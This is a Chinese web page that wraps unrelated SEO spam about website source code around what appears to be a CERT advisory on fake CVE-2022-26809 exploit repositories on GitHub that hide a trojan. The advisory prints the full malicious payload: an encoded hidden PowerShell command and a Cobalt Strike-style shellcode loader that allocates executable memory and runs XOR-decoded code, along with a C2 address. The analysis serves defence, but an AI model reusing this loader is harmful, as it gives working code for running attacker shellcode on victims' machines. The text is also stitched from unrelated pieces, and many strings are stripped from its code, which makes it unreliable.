本篇文章给大家谈谈17zwd网站源码分享,以及网站源码站对应的知识点,文章可能有点长,但是希望大家可以阅读完,增长自己的知识,最重要的是希望对各位有所帮助,可以解决了您的问题,不要忘了收藏本站喔。
2022年5月19日,亚信安全CERT监测发现Github账户为rkxxz的用户发布了CVE-2022-26809和CVE-2022-24500的项目,项目内容介绍为:CVE-2022-26809RCEExploitRemoteCodeExecution和CVE-2022-24500RCEExploitSMBRemoteCodeExecutionVulnerability。经亚信安全CERT专家分析,该用户发布的多个项目内皆包含木马文件,亚信安全CERT提醒大家做好安全防范,不要下载、运行该用户(rkxxz)的任何项目文件!
截至通告发布,亚信安全CERT第一时间对事件进行了跟踪分析,尚未在各大论坛发现该作者推送信息。预测下一波可能会到各大论坛对存储库进行推广,亚信安全将持续关注动态。
同时,由于近期安全事件频发,类似的钓鱼、水坑攻击层出不穷,亚信安全CERT提醒大家,对来历不明的文件一定要进行安全检查,防止误操作给个人和企业造成损失。
事件分析
一、背景介绍
2022年5月19日,亚信安全CERT监测发现Github账户rkxxz创建了CVE-2022-26809的项目,安全专家对项目内容开展分析。
二、分析过程
1.查询目标基本信息
源码为C34;powershell-nop-whidden-encodedcommandJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLAFYAVwArADIALwBpAFMAQgBMACsAZQBmAGcAcgB2AEYARwBrAEQAVQBxAEMAdwBSAEIAQwBNAGwAcABwADIAZwBhAEQAQwBXACsARABlAFUAVABSAHkAWQArADIAYQBXAGcALwA0AG0ANQBqAG4ATgBuADUAMwA2ADgATQBoAEYAdABtADcAdgBhAGsATwB5AFQATAA3AHEATABxAHEALwBxAHEAcQA3AHQASwB4AC8AeABlADUAegBHAHgAZQBUADkAMABzAEgAQgB2ADQASgBpAFIATQBCAEMAawBRAHUARwA2AEcAVwBwAGMAKwBFAFAANAA5AG4AdgBoADIAbQBRAE0AKwB4AGIATgA4AHUAVgBWADQAVQB2AEMAUwBPAEEASgBlAHMAWQA0ADkAcgA5AGUATABrAHUAVABKAE8ARABFAHgAeQBVAHQANABEAGcATwBJAHgAMwBIAE8AMgBKAGoAQgBtAHEAQgA2AFcATQBXAG0AVABZAFcAUwBMAEQAQgBOAGgAZQArAEYANwA1ADgAaQBSAEsATABFAGwAdQB3AEsAYgBnAFEAMwBDAFMAdwBEADkASQB2AHIAeQBvADEAUABmAFkAbQBuAFAANwBHAFEAZQBJAEwAaQBOAEwAUQBOAGoAbQBFAE4AOAAwAGkATABIAHcAWABsAE4ARAAzAFMAUgA1AGkAZQBWADgAcABsADgAdAAzAHcAZwBRAHoAYwBJAGMAUABFAGcAawBrAHcAbwAvAC8AaABOAFgASABmAGgAaABuAG8AegBqAGsARQBFAGgATwArAEwAdgBRADIAbQBNADcANABYAGkAQwBUAFcAYwBlAEUAMwA1AEUAcQBmADAATgB4AGgAUgBvAEMAcwA5AEMAUQBnAEsAZwBJAG0AaQBCAFMANABKAFAATQAvAFgAMABPAHgAawAzAEsAZABYADgASwBJAHoANQB6AGQAVQBXAHgAdwBHAG0AVgBhAG4AawBVAEgAcABWAFAAQQBNAHkARABzAFEAQQBkAHcAOQBKAEMAdwBDAEwAagAzAGcAcwBHAEMAVABtAGkAVQBrAFAAdgBHADkATwBNAGgAbwBoAHgANABrAHgAWQAzAGQASAB4ADAANgBxAGsAdwA5ADgAVwByAGoAMABNAGsAZABuADgAWQBsAG8AOABlAHYALwBFADQANABTAFkANQBQAGoANgBSAHAAZQB6AHIALwBDAE8AYQA0AFIAaAB5AEsAeQBJAEgAMQAvAGkAWQB1AGIAOQB2AFkAWQAzAEYAawBaAFoARABFAC8ARQB6AGkATABSADIAWQBNAHQAUQBHACsAegBzAFkASABYADgARABpAGsAUABhAC8AYQBCADYAOQBhAGMANwAvAHkAQwBRAEgAbgA1AHUARQBxADIARwBzAFEAOAAxAFMAUABMAFQAeQBTAHYAeABrAHMAKwA2AFkAZwBVAE0AaAA0AE0AUABXAE8AbQBtAGYAVQBFAG8AWQB0AHMAUABBAFkAUQBlAFAAcwBKADAALwBDAGwAZgBmADQASABEAFkAbwBSADgAUgBpAG0AUABZADcAZwBGAE8ANwA0ADgANABRAHAALwBZAGMAYwBoAEMAbAA1AGMAVQBmAFcAMwBHADAAZQBtAGwAdwBOAG0AQwBMAGQAZwBSAEIAOABlAEYANgB5AGgAbgB5AHkANABOAFQANABjAG4AVgAyAHkARwArAGYAdQBJAGYAdgA0ADQAWgA0AGgAOQAyAHAAYwBtADIATQBVAHgARABtAHoAcwBvAE8AUABwAEoASgBpAFYASQBMAGMAVABNAC8ARAB3AHoAYgBlAGIAcQB4AE4AbQBuAG8AOAA3ADQAWABYAEUAagBxADcAZQBTAGkAZgAxAHIATgBRADcAbABVAHEAeABlAEEAWgB0ADQAdwBEAEgAcwBNAHQAYQBjAEQAdwBoAEUATwBYADEATgBFADUAdwA0AFIAcQAyAEwASwBIADUAWQBUAHQAVAAvAHcAegB1AEUAMAArAE4AUQAxADgAUABrADkAagBHAE4AeQBlADQATwArAEYAOABjAHgAUQBMAGgAVgBjADUANAAvAGoAMQA3AGUAMQA2AFoAOABiAC8AcwBQAFAAcgA1AGcALwBoADkAVQB3ADgAMgBPAEcAWQB2AHoAMAAvADUAeQBpAHkAeQBYAEMAOQBsAHQAOQBMAGcAWABkAHoASgBRADUASgBGADgARgB2AHEAUQBXADAANwAzAFMAMwBwAEsASwBsADgAUABUAGgAbQBaAEcAcQBGAGoAWQBmAG4AWgBmAHUAcABpAFAAMgBiAFkAVwBOADIAbQBvAEQAawBkAFIATAA3AGMAWQBBADIAUwA1AHAAcQBOADAARgA2AEkAMQBKAFcAVwBzAGcAUgArAG0ATgBPADAAUgBOAE8ANQBNAFgANQBNAGcAZwA4ADUAYQBrADQAbgBuAEkARwBXADEARwBMAGIAOAAzADAASgBoAGMATwBlAEUAYwA3AGUAMQBhAHIAYgBNAG8AbwAyAHEAMQBOAHEAeQBXAHQAdwA3AHUANQB2AHAAYgA1AEEAeAA4AGsAdQA1ADcAOABHADAAagBaADkAaQBUAHcAYQA2AHMAMABWAFoAWABtAFYAaAB6AFMAVgAzAE4AYQBVAGUAcwBxAFcAdAAzAEgAagBLADkAWABsAHMANQBaAHYAdQBCAE8AawBnAE8ASABZAGsAbQBwAGoARQBKAHAAeAAzAGIAbAAwAFgAUgA2AEwAdABQAEMANgBQAGkATABBAHoASgBxAHgAdQBCAEgANABoAFAAaQAyAGkAZABFADEAWABaAFAAagBQAFUAaQBlAGsATgBKAHIATQA1AHgASgBjAGkATgBLAHYASQBvAFYASAB6ADMAZgAxAE8ATgBPAHAAVgAyAFkASQA4ADYAQwBaAEMAeQBsAEsAYgA2AEQAUABhAG4AYwA2AG8ASABOAFkAcgBzADIAUQBJAHUATQBRADIAbQAyAGsARgA3AFUAWABBAE4AbgBkAFAAVQA4AFAAMwB1AEwAeABlAFAANABwAFAAYwB6AFYARgB0ADYAMAAwAGIAUwBIAFUANwBJAGgAcgBkADEAVwBXAHQAZQBDAGgAbgB0AEwAdwBuAFMAMwBJAHcAcwAxAHQAMQBYAEMAaQBxADcAagB2AEgAdQBNAHoAUABXAGQAaQBBAEQAYQB2AHUASgA0AEMAMgBMAHMAVQA3AFMARABDAGgAMwAxAFYAcgA0AEoATwB0AEIAMABEADEAagBEAG8AbwBqAEYAQwBkAFcAMABuAGkAbQBKAGoAMQB3ADkAVwBxAHAAVwBpAGUAUwBXAHcAZQBHADgAMAAvADYAagBNAEQAWgBGAHkAWgA1AHIAUgBiAFAAWgBFAEgAOQBMAHAAZABxADMAcQAyAGwAagBSAHMAcgBZAGYANgBZAGEANABVAFYAWQB2ADQAaABZAE4AZQB0AG0AYQB5AFMAdQByADIAZAAxAFkAeQAyADUARgBUADYAVgA5AFoARwBVAHYAVABPAE8AOQBUAGEAZQAvAFQANQA1AGUATgBHAGMANgBNAC8AVABxAHUAegBSAEQAKwAxAEcAbABpADEAVABqAFkANwBYAFEAKwBIAGoAdQBVAEMAcwBZADEANwBWAFcAWgBZAGQAOQB5AHEAeAAyAGEAegBmAFEAYQA2AG0AbQByAEQAZQBXAFYARQBtAFgAaQAwAG0AMAA5AFAAZAAwAG0ATQBtAEQAVwBaAG0AcQBXAG4ATwBiADkASgB2AE0ATQAyAEEALwBWAHUAMgBuAHEAcAAzAEoAUQAwAE4AQgBVAG0ALwBUAGUAdABSAFUASgA3AEkAMgB5AHoATABvADEAZwBhAGIATQBhAHcAbgBtAFQAbQBmADUAUABnAEgAVABKAEEAUABaADAAMABrAHYAWQB6AEwATAA2AGoAWAByAFQAZQA2ADYANgBtADAAcwB0AFUAMgBTAFYAbABMAHEANQBtAEsAcwArAHcANwB6AFgAVABTAHEASAA5AHMASAArAEwAMwBSAEUAeQAwAHMAYgAyAHMAagAyADcATABjADYAVQA5AFUAZABMAGUAVQAvAHYAMgBrAFQASAB4AGYAUgBPAG4AWQBXAE0AMABKAFIAVwB1AE4AQwBvAGYAWgB0AGEAUABzADIARwBVAFEAZgB4ADgAVQBKAE8ATgBCADgAZgBSADAAdwAwAFcAMQArAEgAYwBXAGUALwBvAGMAcQA3AFgAeQA0ADgAZABhADcAQQB4AG8AbgBGAGEAOQBXAGQASgB5AHoAQwB3ADEAOQBiAFUAYwBqAE8AaQB3ADgAWQBIADUAVgA2ADkAVQArADMARwBmAFUAdAB1AFAAaQA2AGoANQByAHcAVwBKAFoAVgBwAHQAbQBwAHUAcABGAEcATAA2AFcANwA2AHUASwBoAHoAdgAvAEcAaAB0AE4AegBoAGIARgBnAGYASQBwAG4ARQBWAFQAeQBMAHoATwBYAEEAYQBlAGwAZABhAHgAagBQAHAAcwBGADIATQBHAHgASwBMACsANQAwAHoARQBSAHoAdAB0AHIAVQAyADUAMQBiAGEANwBoAGYAOQA2AHMAagAyAFkANABVAHgAWQArAGEAVQBrAGMAZABhAHAAcgBJAFIARQBlAHgAMQBjAGoAYgBxAHEAUgBSAGMALwBsAFQAVgBaAFAAbgBkAFUAbQBTAHQANgB1ADQAQgAzAFgAZQA2AE0AMgBKAEEAWABWAHEAYgB1AFUAUQB5AFYAQQB0AGIAUQA4AGgASwBCAE4ARABXAGkAOABqAGQAVQBTAGgARABxAGYASgBPAEMAOQAwAEoARQB1AEcATwBpAFUAWQA2AGgAUQBoAFUASgBMAHoAVwB0AFYAcABHAEoAQgBEAHIAWABhAG0AawBGAFoAYgBUAG0AcwBMADUARwBCAGoAbQBkADYAUwBTAEgAUgBGAHMAVAAvAGQAWgByAEIAWABhAFcAKwBqADUAZQA5ADkAMwB6AHQAZwBvAFMAdQA0AFkANgA2AHQAeABIAFUAUAB0AC8ATAByAGMAYwBnAG8ANQBUAE0ARgBYAEMAcwBYAHYAUgBSAEcAaABmAE0AbABWAE8AcgBoAHcATwBOAHIANABWAGEAbwAzAEYAMABZADMAVgA3ADIAVQBzAEQANABIAEMALwB1AEkAVgAvAC8AUgBmAFUANABtAHYAdwBFACsAUABQAFEAQQBYAG8ALwBEAHgAMwBGAEEAbgBHAEYAbQAxAGMANQBEAE8AbgBiAGIAeQBjAHkAUgBaAGcAdQBDAGwAKwB1AFAAUgBwAGEASgBuADAAKwAzADgAUABWAHIAeQBDAE4ATQBVACsAZwByAHgAVgArAEYARgA3AC8AZgB2ADQAcQA5AGMAMgBZAHIAVQAxADYAaQBDADMASwBiAHMANwA4ADcANABRADgARwAwAGQAUAB2ADYAYQBsAFcASABnADkAOQBzAFkAMwA0AFoAbwBmAGUAdQArAHYAcQBiADIAWQBDADgAcQBYAGUATQBkAGwAKwBaAEwAVwBFAGEAaQBZAFQAMwBxAC8AcwBIAHEAOABaAEgAVgBxAE8AOQBLAHYAWAB2ADkAZABHAHoAOABoAC8ANQBUADIAdgBKAG0ARAB3AGUAZQBBAFYAaQB6ADgARABnADEAYwB5ACsATQA1AFUAWAB0ACsAWgBqAEMAbQBDAFAAZgA0AFgAVwBnAGMAbwBtAEwANQBtAEgASwAvAEMAUwAzAEkALwBLAEcAVAAzAFYAeQBiAFIAVQBGAHIATABhAEMAZgBDAFQAKwBFAGUAOABnAHgAWQBsAFYASgB1AEUAZQB4AGwALwBnAFkAaABvAHIAagBzAFAAeQBuAGsARQBKAFUAQgA4AE0ALwBZAFIAaQAxAE0AZABuAGgAKwAyADUAbwBBAFIARgBNAEcAYwA2AGgARAB5AEMANQBNAHMAagArAEMAUwBHAHIAagAvADEAOQBDAHcAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA&34;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&39;
functionfunc_get_proc_address{
Param($var_module,$var_procedure)
$var_unsafe_native_methods=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache-And$_.Location.Split(&39;)[-1].Equals(&39;)}).GetType(&39;)
$var_gpa=$var_unsafe_native_methods.GetMethod(&39;,[Type[]]@(&39;,&39;))
return$var_gpa.Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-ObjectSystem.Runtime.InteropServices.HandleRef((New-ObjectIntPtr),($var_unsafe_native_methods.GetMethod(&39;)
).Invoke($null,@($var_module)))),$var_procedure))
}
functionfunc_get_delegate_type{
Param(
[Parameter(Position=0,Mandatory=$True)][Type[]]$var_parameters,
[Parameter(Position=1)][Type]$var_return_type=[Void]
)
$var_type_builder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-ObjectSystem.Reflection.AssemblyName(&39;)),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicMod
ule(&39;,$false).DefineType(&39;,&39;,[System.MulticastDelegate])
$var_type_builder.DefineConstructor(&39;,[System.Reflection.CallingConventions]::Standard,$var_parameters).SetImplementationFlags(&39;)
$var_type_builder.DefineMethod(&39;,&39;,$var_return_type,$var_parameters).SetImplementationFlags(&39;)
return$var_type_builder.CreateType()
}
[Byte[]]$var_code=[System.Convert]::FromBase64String(&39;)
for($x=0;$x-lt$var_code.Count;$x++){
$var_code[$x]=$var_code[$x]-bxor35
}
$var_va=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_addresskernel32.dllVirtualAlloc),(func_get_delegate_type@([IntPtr],[UInt32],[UInt32],[UInt32])([IntP
tr])))
$var_buffer=$var_va.Invoke([IntPtr]::Zero,$var_code.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code,0,$var_buffer,$var_code.length)
$var_runme=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer,(func_get_delegate_type@([IntPtr])([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
If([IntPtr]::size-eq8){
start-job{param($a)IEX$a}-RunAs32-Argument$DoIt|wait-job|Receive-Job
}
else{
IEX$DoIt
}
判断为CS(CobaltStrike)默认的powershell生成模板,只需要处理base64之后异或0x23即可得到原始shellcode。
原始shellcode
得到C2服务器信息45.197.132[.]72,至此样本分析工作结束。
三、溯源分析
1.分析C2服务器IP关联信息
通过VT查询到域名关联信息为2020年1月5日,目前无法确定真实关联程度。
通过fofa、quke等资产测绘平台均未发现历史扫描信息。无法确定资产历史情况。怀疑可能是新资产,同时,我们针对github上传信息进行溯源确认。
2.分析Github账户信息
创建者ID:rkxxz的提交记录如下。该用户具备安全防范意识,使用了github默认邮箱。
该用户4月19创建的账户
该用户于5月19日发布了两个项目,都含有木马程序。
3.分析C2资产信息
45.197.132[.]72的20223为关联端口,8899为上线端口。
4.IOCs
?45.197.132[.]72
?https://github[.]com/rkxxz
关于17zwd网站源码分享,网站源码站的介绍到此结束,希望对大家有所帮助。